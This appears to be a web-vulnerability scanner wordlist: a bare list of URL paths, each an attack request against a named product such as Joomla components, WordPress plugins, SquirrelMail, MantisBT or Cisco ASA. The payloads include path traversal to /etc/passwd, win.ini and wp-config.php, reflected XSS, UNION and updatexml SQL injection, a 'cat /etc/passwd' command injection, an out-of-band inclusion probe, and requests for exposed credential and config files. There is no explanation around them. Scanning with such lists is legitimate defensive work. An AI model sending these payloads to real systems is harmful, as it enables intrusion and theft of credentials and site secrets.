/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search
/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search
/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/src/redirect.php?plugins[]=../../../../etc/passwd%00
/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
/adm/file.cgi?next_file=%2fetc%2fpasswd
/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd
/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd
/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}
/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd
/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd
/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00
/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00
/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd
/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../../etc/passwd
/pandora_console/ajax.php?page=../../../../../../etc/passwd
/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_canteen&controller=../../../../../etc/passwd%00
/index.php?option=com_jejob&view=../../../../../../etc/passwd%00
/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
/document.php?modulepart=project&file=../../../../../../../etc/passwd
/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00
/?q=node&destination=node
/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
/servlets/FetchFile?fileName=../../../etc/passwd
/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/%5C../ssl/yaws-key.pem
/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php
/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
/.../.../.../.../.../.../.../.../.../windows/win.ini
/.../.../.../.../.../.../.../.../.../etc/passwd
/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
/verify.php?id=1&confirm_hash=
/mantis/verify.php?id=1&confirm_hash=
/mantisBT/verify.php?id=1&confirm_hash=
/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
/bugs/verify.php?confirm_hash=&id=1
/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/command.cgi?cat%20/etc/passwd
/uir//etc/passwd
/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
/img.php?f=/./etc/./passwd
/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
/meta
/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data
/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg
/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd
/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../etc/passwd
/index.php?q=file:///etc/passwd
/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
/catalog.php?filename=../../../../../../../../../etc/passwd
/cgi-bin/config.exp
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/?c=../../../../../../etc/passwd%00
/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
/wp-json/wp/v2/lesson/1
/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
/index.php?page_slug=../../../../../etc/passwd%00
/file?valore=../../../../../windows/win.ini
/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)
/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg
/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green
/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
/core/config/databases.yml
/configuration.yml
/config/configuration.yml
/redmine/config/configuration.yml
/debug/
/_vti_pvt/service.pwd
/admin/
/solr/admin/

/mongo-express/
/db/admin/system.users
/sensorlist.htm
/avatar_uploader.pages.inc?file=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/./../../../../../../../../../../etc/passwd
/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00
/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=
/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
/password.cgi
/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/download?type=files&filename=../../../../../../../../etc/passwd
/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../etc/
/js/../../../../../../../../etc/passwd%00.jpg
/ftb.imagegallery.aspx
/file=C:%5CWindows%5Cwin.ini
/css_parser.php?css=css_parser.php
/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
/webshell4/login.php?err=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/webshell4/login.php?login=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/login.php/
/phpwiki/index.php/passwd
/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif={{rand_base(4)}}
/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
/lan.html
/Solar_Image.php?mode=resize&fname=test%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php?content=../../../../../../../../etc/passwd
/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E
/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E
/wt3/forceSave.php?file=/etc/passwd
/download.do?file=../../../../config.text
/src/read_body.php?mailbox=/etc/passwd&passed_id=1&
/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00
/wp-content/plugins/boldgrid-backup/cron/restore-info.json
/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd
/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
/?mdocs-img-preview=../../../wp-config.php
/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1
/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E
/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E
/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E
/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd
/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
